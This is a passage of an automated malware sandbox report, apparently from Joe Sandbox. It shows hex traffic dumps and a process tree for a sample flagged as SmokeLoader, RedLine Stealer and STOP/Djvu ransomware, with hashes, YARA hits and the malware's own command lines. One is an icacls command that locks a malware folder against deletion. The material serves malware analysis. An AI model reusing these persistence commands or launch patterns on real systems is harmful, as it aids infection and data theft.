2023-07-27 18:19:34 UTC	917	IN	Data Raw: 32 30 30 30 0d 0a e0 55 f1 42 4a 4a 4a 4a 4a 4a 4a 4a 4a f1 55 e0 e0 55 f1 42 42 42 42 42 42 42 42 42 42 f1 55 e0 e0 55 f1 42 6d b1 b1 b1 b1 b1 b1 b1 6d f1 55 e0 e0 55 f1 6d 5a 5a 5a 5a 5a 5a 5a 5a b1 f1 55 e0 e0 55 f1 b1 5a ae 0e 0e 41 41 de 5a b1 f1 55 e0 e0 55 f1 b1 5a ec 6f ae ae ae 0e 5a b1 f1 55 e0 e0 55 f1 b1 5a 4f 4f 4f ec 6f 6f 5a b1 f1 55 e0 e0 55 f1 b1 5a 04 04 7f 7f 4f ec 5a b1 f1 55 e0 e0 b2 f1 b1 d0 86 d3 fe fe 04 04 5a b1 c8 55 e0 e0 e0 55 b1 b1 b1 b1 b1 b1 b1 b1 b1 88 55 55 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 ff ff 00 00 f0 01 00 00 e0 01 00 00 c0 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 80 01 00 00 c0 01 00 00 ff ff 00 00 28 00 00 00 30 00 00 00 60 Data Ascii: 2000UBJJJJJJJJJUUBBBBBBBBBBUUBmmUUmZZZZZZZZUUZAAZUUZoZUUZOOOooZUUZOZUZUUUU(0`
2023-07-27 18:19:34 UTC	925	IN	Data Raw: 81 80 7f 7f 80 7f Data Ascii:
2023-07-27 18:19:34 UTC	925	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	925	IN	Data Raw: 32 30 30 30 0d 0a 7e 7f 7f 7e 81 7f 7f 80 7e 81 7f 80 7f 7e 7e 7e 7f 80 81 81 7f 80 81 81 7f 80 81 81 80 80 7f 80 7e 80 7f 7f 80 7f 7f 7f 7f 80 81 81 80 80 80 81 7e 7f 7f 7e 80 7e 81 7e 7e 80 81 7e 7f 80 7f 7f 7e 80 81 81 81 7f 80 7e 7f 80 80 81 7f 80 7e 7f 7f 81 7f 80 7f 81 7e 7e 81 7f 81 80 80 80 80 7f 7f 7f 80 7f 80 80 80 81 7f 80 7f 80 81 80 7f 7f 81 7f 80 7f 81 80 81 7f 7f 80 7f 7e 80 7e 81 80 7f 80 7e 81 80 7f 80 7f 7f 7f 7f 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 7f 80 7f 80 80 7f 80 7f 81 7f 80 7f 80 80 81 80 81 81 81 7f 80 81 80 7e 7e 7f 81 7e 81 80 7f 7e 80 80 7e 7e 7e 80 7f 80 80 80 7e 7f 81 7e 7f 80 7e 7f 80 7f 80 81 7f 81 7e 80 7f 7f 81 81 80 81 81 7f 7e 7e 7e 81 7f 7f 81 80 80 7e 7e 7e 7f Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:19:34 UTC	933	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	933	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	933	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 f8 00 01 00 f0 00 01 00 e0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 c0 00 01 00 ff ff ff 00 ff ff ff 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000( @
2023-07-27 18:19:34 UTC	941	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-07-27 18:19:34 UTC	941	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	941	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 04 05 03 ff 04 05 03 ff e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000
2023-07-27 18:19:34 UTC	949	IN	Data Raw: 72 00 69 00 72 00 Data Ascii: rir
2023-07-27 18:19:34 UTC	949	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	949	IN	Data Raw: 34 34 38 0d 0a 61 00 6b 00 69 00 6b 00 61 00 6b 00 61 00 77 00 20 00 72 00 69 00 72 00 6f 00 6e 00 6f 00 6b 00 6f 00 62 00 69 00 62 00 69 00 20 00 64 00 65 00 77 00 69 00 6b 00 65 00 63 00 69 00 68 00 00 00 6c 00 44 00 65 00 73 00 65 00 6d 00 75 00 7a 00 75 00 63 00 65 00 79 00 75 00 20 00 79 00 65 00 6e 00 65 00 6e 00 75 00 20 00 67 00 6f 00 70 00 61 00 62 00 65 00 76 00 61 00 67 00 69 00 76 00 20 00 67 00 75 00 62 00 69 00 64 00 61 00 66 00 75 00 79 00 61 00 20 00 6d 00 65 00 72 00 6f 00 20 00 6a 00 6f 00 78 00 61 00 66 00 6f 00 6d 00 20 00 6d 00 75 00 76 00 6f 00 72 00 6f 00 66 00 61 00 20 00 68 00 75 00 6a 00 61 00 74 00 69 00 76 00 69 00 78 00 69 00 67 00 6f 00 6a 00 6f 00 20 00 79 00 6f 00 7a 00 65 00 6e 00 6f 00 78 00 61 00 64 00 61 00 6b 00 65 00 Data Ascii: 448akikakaw rironokobibi dewikecihlDesemuzuceyu yenenu gopabevagiv gubidafuya mero joxafom muvorofa hujativixigojo yozenoxadake

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 4676, Parent PID: 3528

General

Target ID:	0
Start time:	20:18:00
Start date:	27/07/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	322'560 bytes
MD5 hash:	B44C8FB3583E3E3C9324A535E356A8D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.572111296.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.572170619.00000000024CA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 4676

General

Target ID:	3
Start time:	20:18:06
Start date:	27/07/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3'933'184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rfuiwjhPID: 6860, Parent PID: 1088

General

Target ID:	4
Start time:	20:18:39
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Roaming\rfuiwjh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rfuiwjh
Imagebase:	0x400000
File size:	322'560 bytes
MD5 hash:	B44C8FB3583E3E3C9324A535E356A8D0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.636523858.00000000025F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: E640.exePID: 7032, Parent PID: 3528

General

Target ID:	5
Start time:	20:18:43
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\E640.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E640.exe
Imagebase:	0x400000
File size:	842'752 bytes
MD5 hash:	87F85379DFCEA834C8BE87CD575C5E48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: E640.exePID: 7100, Parent PID: 7032

General

Target ID:	6
Start time:	20:18:45
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\E640.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\E640.exe
Imagebase:	0x400000
File size:	842'752 bytes
MD5 hash:	87F85379DFCEA834C8BE87CD575C5E48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 617B.exePID: 7136, Parent PID: 3528

General

Target ID:	7
Start time:	20:18:45
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\617B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\617B.exe
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.635919053.0000000003FD8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 617B.exePID: 3192, Parent PID: 7136

General

Target ID:	8
Start time:	20:18:46
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\617B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\617B.exe
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 6708, Parent PID: 3528

General

Target ID:	9
Start time:	20:18:47
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\5274.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5274.exe
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.640494053.0000000004023000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 6700, Parent PID: 6708

General

Target ID:	10
Start time:	20:18:49
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\5274.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\5274.exe
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 976, Parent PID: 6700

General

Target ID:	11
Start time:	20:18:50
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xf80000
File size:	29'696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: C474.exePID: 6756, Parent PID: 3528

General

Target ID:	13
Start time:	20:18:52
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\C474.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C474.exe
Imagebase:	0x400000
File size:	842'752 bytes
MD5 hash:	87F85379DFCEA834C8BE87CD575C5E48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.664431605.000000000400F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 2148, Parent PID: 1088

General

Target ID:	14
Start time:	20:18:53
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.696312299.0000000003FD7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 325D.exePID: 6864, Parent PID: 3528

General

Target ID:	17
Start time:	20:18:56
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\325D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\325D.exe
Imagebase:	0x400000
File size:	414'208 bytes
MD5 hash:	7A366DFF7F1AA77CA3371742D300468B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.802780710.0000000002568000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000003.658454549.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.859320186.0000000004131000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: C474.exePID: 476, Parent PID: 6756

General

Target ID:	18
Start time:	20:18:56
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\C474.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C474.exe
Imagebase:	0x400000
File size:	842'752 bytes
MD5 hash:	87F85379DFCEA834C8BE87CD575C5E48
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 5080, Parent PID: 6700

General

Target ID:	20
Start time:	20:18:57
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\5274.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.668986943.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 96DF.exePID: 916, Parent PID: 3528

General

Target ID:	21
Start time:	20:18:57
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\96DF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\96DF.exe
Imagebase:	0x400000
File size:	322'048 bytes
MD5 hash:	9D63567EDC2EAD059C20C4F861E85202
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.678831039.0000000003E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.678506233.0000000002549000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000003.662382966.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 7048, Parent PID: 3528

General

Target ID:	22
Start time:	20:19:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Imagebase:	0x400000
File size:	842'240 bytes
MD5 hash:	8471A1A3950D0B7A56B8EC23F8201F97
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.671418165.0000000003FBC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: FE5F.exePID: 3132, Parent PID: 3528

General

Target ID:	23
Start time:	20:19:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\FE5F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\FE5F.exe
Imagebase:	0x980000
File size:	4'351'488 bytes
MD5 hash:	26115AFB115A50A1CBBC4A4DE8C6816D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.687087896.0000000004165000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\FE5F.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: 5274.exePID: 2788, Parent PID: 5080

General

Target ID:	24
Start time:	20:19:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\5274.exe
Wow64 process (32bit):	true
